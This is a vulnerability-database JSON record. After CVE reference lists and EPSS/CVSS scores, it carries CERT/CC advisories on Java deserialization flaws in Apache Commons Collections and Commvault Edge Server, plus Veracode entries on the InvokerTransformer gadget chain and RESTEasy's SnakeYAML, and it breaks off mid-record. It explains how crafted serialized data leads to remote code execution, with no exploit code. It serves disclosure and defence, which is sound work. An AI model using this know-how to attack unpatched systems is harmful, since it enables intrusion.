{"type": "rapid7blog", "idList": ["RAPID7BLOG:49C18614AD01B6865616A65F734B9F71"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhat", "idList": ["RHSA-2015:2500", "RHSA-2015:2521", "RHSA-2015:2522", "RHSA-2015:2523", "RHSA-2015:2534", "RHSA-2015:2535", "RHSA-2015:2536", "RHSA-2015:2560", "RHSA-2015:2671", "RHSA-2017:1410", "RHSA-2017:1411", "RHSA-2017:1412", "RHSA-2017:2636", "RHSA-2017:2888"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-26217"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33"]}, {"type": "seebug", "idList": ["SSV:92547", "SSV:92655", "SSV:92746", "SSV:92804", "SSV:92914", "SSV:92965", "SSV:93062", "SSV:96420", "SSV:96733", "SSV:97009", "SSV:97346"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1222-1", "OPENSUSE-SU-2016:1230-1", "OPENSUSE-SU-2016:1235-1", "OPENSUSE-SU-2016:1262-1", "OPENSUSE-SU-2016:1265-1", "SUSE-SU-2016:1248-1", "SUSE-SU-2016:1250-1", "SUSE-SU-2016:1458-1", "SUSE-SU-2016:1475-1"]}, {"type": "symantec", "idList": ["SMNTC-1334"]}, {"type": "talos", "idList": ["SAP"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:BAEF6DAD5A5E413B7D119204D0BFE0A9", "THN:E95B6A75073DA71CEC73B2E4F0B13622"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:F0F8FE52B35B4B90B6C6B9412F88CA1B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "ubuntu", "idList": ["USN-2923-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-9606", "UB:CVE-2017-1000353", "UB:CVE-2017-2608"]}, {"type": "vmware", "idList": ["VMSA-2016-0020"]}, {"type": "zdi", "idList": ["ZDI-16-523"]}, {"type": "zdt", "idList": ["1337DAY-ID-26307", "1337DAY-ID-28445", "1337DAY-ID-29065", "1337DAY-ID-29668"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2012-4858", "epss": "0.009070000", "percentile": "0.803380000", "modified": "2023-03-14"}, {"cve": "CVE-2015-3253", "epss": "0.014080000", "percentile": "0.844100000", "modified": "2023-03-14"}, {"cve": "CVE-2015-4852", "epss": "0.963130000", "percentile": "0.991980000", "modified": "2023-03-14"}, {"cve": "CVE-2015-5254", "epss": "0.038590000", "percentile": "0.905130000", "modified": "2023-03-14"}, {"cve": "CVE-2015-5348", "epss": "0.007770000", "percentile": "0.785940000", "modified": "2023-03-14"}, {"cve": "CVE-2015-6420", "epss": "0.008800000", "percentile": "0.800250000", "modified": "2023-03-14"}, {"cve": "CVE-2015-6555", "epss": "0.004000000", "percentile": "0.694730000", "modified": "2023-03-14"}, {"cve": "CVE-2015-6576", "epss": "0.005430000", "percentile": "0.738400000", "modified": "2023-03-14"}, {"cve": "CVE-2015-6934", "epss": "0.002820000", "percentile": "0.636010000", "modified": "2023-03-14"}, {"cve": "CVE-2015-7253", "epss": "0.004200000", "percentile": "0.701630000", "modified": "2023-03-14"}, {"cve": "CVE-2015-7450", "epss": "0.974190000", "percentile": "0.998560000", "modified": "2023-03-14"}, {"cve": "CVE-2015-7501", "epss": "0.013000000", "percentile": "0.837540000", "modified": "2023-03-14"}, {"cve": "CVE-2015-8103", "epss": "0.254880000", "percentile": "0.959290000", "modified": "2023-03-14"}, {"cve": "CVE-2015-8360", "epss": "0.006510000", "percentile": "0.762610000", "modified": "2023-03-14"}, {"cve": "CVE-2015-8765", "epss": "0.004180000", "percentile": "0.701170000", "modified": "2023-03-14"}, {"cve": "CVE-2016-0714", "epss": "0.007260000", "percentile": "0.776900000", "modified": "2023-03-14"}, {"cve": "CVE-2016-0779", "epss": "0.049370000", "percentile": "0.915560000", "modified": "2023-03-14"}, {"cve": "CVE-2016-0788", "epss": "0.033590000", "percentile": "0.898860000", "modified": "2023-03-14"}, {"cve": "CVE-2016-0958", "epss": "0.003910000", "percentile": "0.691530000", "modified": "2023-03-14"}, {"cve": "CVE-2016-1291", "epss": "0.162760000", "percentile": "0.951070000", "modified": "2023-03-14"}, {"cve": "CVE-2016-1487", "epss": "0.005570000", "percentile": "0.741870000", "modified": "2023-03-14"}, {"cve": "CVE-2016-1985", "epss": "0.004530000", "percentile": "0.712900000", "modified": "2023-03-14"}, {"cve": "CVE-2016-1986", "epss": "0.002070000", "percentile": "0.569000000", "modified": "2023-03-14"}, {"cve": "CVE-2016-1997", "epss": "0.003140000", "percentile": "0.655100000", "modified": "2023-03-14"}, {"cve": "CVE-2016-1998", "epss": "0.003140000", "percentile": "0.655100000", "modified": "2023-03-14"}, {"cve": "CVE-2016-1999", "epss": "0.003910000", "percentile": "0.691540000", "modified": "2023-03-14"}, {"cve": "CVE-2016-2000", "epss": "0.003140000", "percentile": "0.655100000", "modified": "2023-03-14"}, {"cve": "CVE-2016-2003", "epss": "0.003140000", "percentile": "0.655100000", "modified": "2023-03-14"}, {"cve": "CVE-2016-2170", "epss": "0.016480000", "percentile": "0.856020000", "modified": "2023-03-14"}, {"cve": "CVE-2016-2173", "epss": "0.015030000", "percentile": "0.848870000", "modified": "2023-03-14"}, {"cve": "CVE-2016-2510", "epss": "0.090540000", "percentile": "0.936090000", "modified": "2023-03-14"}, {"cve": "CVE-2016-3415", "epss": "0.003340000", "percentile": "0.665990000", "modified": "2023-03-14"}, {"cve": "CVE-2016-3427", "epss": "0.046410000", "percentile": "0.913090000", "modified": "2023-03-14"}, {"cve": "CVE-2016-3461", "epss": "0.001460000", "percentile": "0.487760000", "modified": "2023-03-14"}, {"cve": "CVE-2016-3642", "epss": "0.004670000", "percentile": "0.716800000", "modified": "2023-03-14"}, {"cve": "CVE-2016-4372", "epss": "0.047470000", "percentile": "0.913940000", "modified": "2023-03-14"}, {"cve": "CVE-2016-4385", "epss": "0.017860000", "percentile": "0.861620000", "modified": "2023-03-14"}, {"cve": "CVE-2016-5004", "epss": "0.002180000", "percentile": "0.579690000", "modified": "2023-03-14"}, {"cve": "CVE-2016-5229", "epss": "0.041710000", "percentile": "0.908710000", "modified": "2023-03-14"}, {"cve": "CVE-2016-6809", "epss": "0.021320000", "percentile": "0.874690000", "modified": "2023-03-14"}, {"cve": "CVE-2016-7462", "epss": "0.002420000", "percentile": "0.603490000", "modified": "2023-03-14"}, {"cve": "CVE-2016-8735", "epss": "0.041200000", "percentile": "0.908160000", "modified": "2023-03-14"}, {"cve": "CVE-2016-8744", "epss": "0.001150000", "percentile": "0.435870000", "modified": "2023-03-14"}, {"cve": "CVE-2016-8749", "epss": "0.027160000", "percentile": "0.888510000", "modified": "2023-03-14"}, {"cve": "CVE-2016-9299", "epss": "0.536300000", "percentile": "0.970200000", "modified": "2023-03-14"}, {"cve": "CVE-2016-9606", "epss": "0.020420000", "percentile": "0.871860000", "modified": "2023-03-14"}, {"cve": "CVE-2017-1000353", "epss": "0.972830000", "percentile": "0.997160000", "modified": "2023-03-14"}, {"cve": "CVE-2017-10271", "epss": "0.975240000", "percentile": "0.999740000", "modified": "2023-03-14"}, {"cve": "CVE-2017-11283", "epss": "0.834280000", "percentile": "0.978360000", "modified": "2023-03-14"}, {"cve": "CVE-2017-11284", "epss": "0.834280000", "percentile": "0.978360000", "modified": "2023-03-14"}, {"cve": "CVE-2017-12149", "epss": "0.974270000", "percentile": "0.998730000", "modified": "2023-03-14"}, {"cve": "CVE-2017-2608", "epss": "0.007230000", "percentile": "0.776340000", "modified": "2023-03-14"}, {"cve": "CVE-2017-3066", "epss": "0.939750000", "percentile": "0.986120000", "modified": "2023-03-14"}, {"cve": "CVE-2017-3159", "epss": "0.008950000", "percentile": "0.801980000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5586", "epss": "0.112700000", "percentile": "0.942490000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5641", "epss": "0.066350000", "percentile": "0.926530000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5645", "epss": "0.022500000", "percentile": "0.878100000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5878", "epss": "0.011260000", "percentile": "0.824310000", "modified": "2023-03-14"}, {"cve": "CVE-2017-7504", "epss": "0.258980000", "percentile": "0.959500000", "modified": "2023-03-14"}, {"cve": "CVE-2017-9805", "epss": "0.975610000", "percentile": "0.999940000", "modified": "2023-03-14"}, {"cve": "CVE-2017-9830", "epss": "0.017640000", "percentile": "0.860650000", "modified": "2023-03-14"}, {"cve": "CVE-2017-9844", "epss": "0.010620000", "percentile": "0.818970000", "modified": "2023-03-14"}], "vulnersScore": 10.0}, "published": "2018-01-24T17:45:08", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "edition": 2, "scheme": null, "_state": {"dependencies": 1660012827, "score": 1683966290, "epss": 1678853679}, "_internal": {"score_hash": "4a3c9dbcc65df79dd05001ea5a72768c"}}

{"cert": [{"lastseen": "2023-07-19T20:16:07", "description": "### Overview\n\nThe Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\n\n### Description\n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420\n\nIn January 2015, at AppSec California 2015, researchers [Gabriel Lawrence and Chris Frohoff](<http://frohoff.github.io/appseccali-marshalling-pickles/>) described how many Java applications and libraries using Java Object Serialization may be vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Any Java library or application that utilizes this functionality incorrectly may be impacted by this vulnerability. \n \nIn November 2015, [Stephen Breen of Foxglove Security](<http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) identified the [Apache Commons Collections](<https://commons.apache.org/proper/commons-collections/>) (ACC) Java library as being vulnerable to insecure deserialization of data; specifically, the ACC `InvokerTransformer` class may allow arbitrary code execution when used to deserialize data from untrusted sources. According to the researcher, this issue affects several large projects that utilize ACC including WebSphere, JBoss, [Jenkins](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>), [WebLogic](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179>), and OpenNMS. Unify also reports that [OpenScape](<https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>) software is affected. In addition, [Cisco](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20>) has released an advisory for their products. \n \nBoth [versions 3.2.1 and 4.0](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) of the Apache Commons Collections library have been identified as being vulnerable to this deserialization issue. \n \nThe Apache Software Foundation has released a [statement](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) regarding this issue, which contains advice for mitigating the issue, as well as further references and links. A [bug](<https://issues.apache.org/jira/browse/COLLECTIONS-580>) tracker entry has been filed to track progress toward a full solution. \n \nOther libraries, such as Groovy and Spring, are currently being investigated for similar flaws. Lawrence and Frohoff's presentation describes how applications and libraries written in other languages, such as Python and Ruby, may also be vulnerable to the same type of issue. It is generally up to software designers to follow best practices for security when handling serialized data, no matter the programming language or library used. \n \n--- \n \n### Impact\n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \nWhile many applications do not actively use serialization or deserailization, they often rely on libraries that do. If a class uses deserialization on some input stream (either a file or socket), and an attacker can send malicious data down that stream, the attacker can cause the program to construct objects of any class on its classpath (whether it uses those classes or not). And some classes, such as those in the ACC automatically execute code based on attacker-supplied deserialization input. \n \nAn application that neither uses deserialization, nor employs any libraries that use deserialization, would not be vulnerable to this problem. Such an application should also lack a plugin architecture, or any mechanism for loading code that might use deserialization. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of a full solution to this problem, but you may consider the following: \n \n**Apply an update** \n \nApache Commons Collections [version 3.2.2](<https://commons.apache.org/proper/commons-collections/download_collections.cgi>) and [version 4.1](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) has been released. These new releases mitigate the vulnerability by disabling the insecure functionality. \n \n**Developers need to re-architect their applications, and should be suspicious of deserialized data from untrusted sources** \n \nDevelopers will need to make further architectural changes to secure their applications before they can re-enable functionality in ACC version 3.2.2 and later. From Apache's statement: \n \n_However, to be clear: this is not the only known and especially not unknown useable gadget. So replacing your installations with a hardened version of Apache Commons Collections will not make your application resist this vulnerability. _ \n \nDevelopers should in general be very suspicious of deserialized data from an untrusted source. For best practices, see the [CERT Oracle Coding Standard for Java](<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>) guidelines for Serialization, especially rules [SER12-J](<https://www.securecoding.cert.org/confluence/display/java/SER12-J.+Prevent+deserialization+of+untrusted+classes>) and [SER13-J](<https://www.securecoding.cert.org/confluence/display/java/SER13-J.+Treat+data+to+be+deserialized+as+potentially+malicious+by+default>). \n \n**Use firewall rules or filesystem restrictions** \n \nSystem administrators may be able to mitigate this issue for some applications by restricting access to the network and/or filesystem. If an affected application, such as Jenkins, utilizes an open port accepting serialized objects, restricting access to the application may help mitigate the issue. \n \n--- \n \n### Vendor Information\n\n576313\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apache Software Foundation Affected\n\nUpdated: November 10, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco __ Affected\n\nUpdated: July 18, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nCisco has released a [security advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>) and list of affected products at the URL below. Cisco has assigned CVE-2015-6420 to this issue.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n\n### Addendum\n\nAs of 2017-07-18, CERT/CC is aware of a report that Cisco Unity Express (CUE) 8.6.1 is still vulnerable to this issue and is incorrectly identified as \"not vulnerable\" in the above Cisco advisory. We have reached out to Cisco for clarification.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23576313 Feedback>).\n\n### IBM Corporation __ Affected\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nIBM has released a security advisory for WebSphere at the following URL:\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n### Jenkins __ Affected\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nJenkins has released a security advisory at the URL below. CVE-2015-8103 was assigned this issue in Jenkins.\n\n### Vendor References\n\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n\n### Oracle Corporation __ Affected\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOracle has released a security advisory at the URL below:\n\n### Vendor References\n\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&amp;sh=&amp;cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179\n>)\n * <https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852>\n\n### Unify Inc __ Affected\n\nUpdated: November 30, 2015 \n\n**Statement Date: November 24, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"Unify is affected in two product lines as listed below. For details refer to the information given in the Security Advisory OBSO-1511-01.\n\nWe recommend all customers to apply the mitigations described in the advisory and install the corresponding product fix releases as soon as available. \nTo get notified about Advisory updates, subscribe as listed in `<https://www.unify.com/security/advisories>`.\"\n\n### Vendor Information \n\nUnify has issued Security Advisory OBSO-1511-01 at the URL listed below. \n \nMitre had assigned two CVE IDs for Unify products impacted by VU#576313: \n \nCVE-2015-8237, affected products: \nUnify OpenScape Fault Management V7 (\"cpe:/a:unify:openscape_fault_management:7.%02\") \nUnify OpenScape Fault Management V8 (\"cpe:/a:unify:openscape_fault_management:8.%02\") \n \nCVE-2015-8238, affected products: \nUnify OpenScape UC Application V7 (\"cpe:/a:unify:openscape_uc_application:7.%02\") \nUnify OpenScape Common Management Platform V7 (\"cpe:/a:unify:openscape_common_management_platform:7.%02\")\n\n### Vendor References\n\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n\n### Red Hat, Inc. __ Unknown\n\nUpdated: November 30, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nJBOSS has been reported as being affected.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.4 | E:POC/RL:W/RC:C \nEnvironmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>\n * <https://issues.apache.org/jira/browse/COLLECTIONS-580>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&amp;sh=&amp;cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 >)\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n * <http://www.openwall.com/lists/oss-security/2015/11/11/3>\n * <http://www.infoq.com/news/2015/11/commons-exploit>\n * <https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/>\n * <http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>\n * <http://mail-archives.apache.org/mod_mbox/commons-dev/201511.mbox/%3c20151106222553.00002c57.ecki@zusammenkunft.net%3e>\n * <http://frohoff.github.io/appseccali-marshalling-pickles/>\n * <http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>\n * <https://www.youtube.com/watch?v=VviY3O-euVQ>\n * <https://commons.apache.org/proper/commons-collections/>\n * <http://cwe.mitre.org/data/definitions/502.html>\n * <https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>\n * <http://www.oracle.com/technetwork/java/seccodeguide-139067.html#8>\n\n### Acknowledgements\n\nThis type of vulnerability was reported publicly by Gabriel Lawrence and Chris Frohoff, and later investigated by Stephen Breen.\n\nThis document was written by Garret Wassermann with assistance from David Svoboda and the CERT Secure Coding team.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6420](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6420>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-11-13 \n**Date Last Updated: ** | 2018-08-27 17:57 UTC \n**Document Revision: ** | 89 \n", "cvss3": {}, "published": "2015-11-13T00:00:00", "type": "cert", "title": "Apache Commons Collections Java library insecurely deserializes data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238"], "modified": "2018-08-27T17:57:00", "id": "VU:576313", "href": "https://www.kb.cert.org/vuls/id/576313", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-19T20:16:07", "description": "### Overview\n\nCommvault Edge Server, version 10 R2, deserializes untrusted, user-provided cookie data, resulting in arbitrary OS command execution with the web server's privileges.\n\n### Description\n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data** \\- CVE-2015-7253\n\n[Commvault](<http://www.commvault.com/>) Edge Server, version 10 R2, deserializes user-provided cookie data without properly validating it first. An unauthenticated attacker with access to the CommVault Edge Server Web Console can provide specially crafted cookie data that, when deserialized, results in the execution of arbitrary OS commands with the web server's privileges. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker can provide specially crafted cookie data that, when deserialized, will execute arbitrary OS commands with the privileges of the web server. \n \n--- \n \n### Solution\n\n**Apply an update** \n \nThe vendor has [issued updates](<http://docs.commvault.com/commvault/v10/article?p=announcement/announcements.htm#Security>) to address this vulnerability. Users are encouraged to update to the latest release, but those unable or unwilling to do so should consider the following workaround. \n \n--- \n \n**Restrict access** \n \nAs a general good security practice, only allow connections from trusted hosts and networks. \n \n--- \n \n### Vendor Information\n\n866432\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Commvault Affected\n\nNotified: September 17, 2015 Updated: November 03, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.5 | E:POC/RL:U/RC:UR \nEnvironmental | 2.1 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.commvault.com/>\n * <https://cwe.mitre.org/data/definitions/502.html>\n * <http://docs.commvault.com/commvault/v10/article?p=announcement/announcements.htm#Security>\n\n### Acknowledgements\n\nThanks to Markus Wulftange and Matthias Kaiser of Code White for reporting this vulnerability.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-7253](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-7253>) \n---|--- \n**Date Public:** | 2015-11-03 \n**Date First Published:** | 2015-11-03 \n**Date Last Updated: ** | 2015-11-06 13:13 UTC \n**Document Revision: ** | 16 \n", "cvss3": {}, "published": "2015-11-03T00:00:00", "type": "cert", "title": "Commvault Edge Server deserializes cookie data insecurely", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7253"], "modified": "2015-11-06T13:13:00", "id": "VU:866432", "href": "https://www.kb.cert.org/vuls/id/866432", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T16:40:24", "description": "Apache Commons includes a class called InvokerTransformer. An application is vulnerable to a deserialization attack if this class is available on the classpath and the application deserializes untrusted or user-supplied data. It's not necessary to actually use InvokerTransfomer to be vulnerable. With these two criteria satisfied, an attacker may construct a gadget chain using classes in the component to execute arbitrary code. The chain relies on the class InvokerTransformer in the org.apache.commons.collections.functors package to invoke methods during the deserialization process. The fix prevents deserialization of InvokerTransformer by default unless it's specifically enabled. CVE-2015-4852, CVE-2015-6420, CVE-2015-7501, and CVE-2015-7450 are all related to this artifact.\n", "cvss3": {}, "published": "2015-11-09T19:34:22", "type": "veracode", "title": "Potential Remote Code Execution Via Java Object Deserialization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-7450", "CVE-2015-7501"], "modified": "2022-04-19T18:41:05", "id": "VERACODE:1847", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-1847/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:33:33", "description": "RESTEasy is vulnerable to remote code execution. SnakeYAML unmarshalling is exploitable for code execution. As RESTeasy uses SnakeYAML and enables the yaml provider by default, under certain conditions, RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker can exploit it to execute arbitrary code with the permissions of the application using RESTEasy.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:16:49", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2019-05-15T06:18:25", "id": "VERACODE:12408", "href": 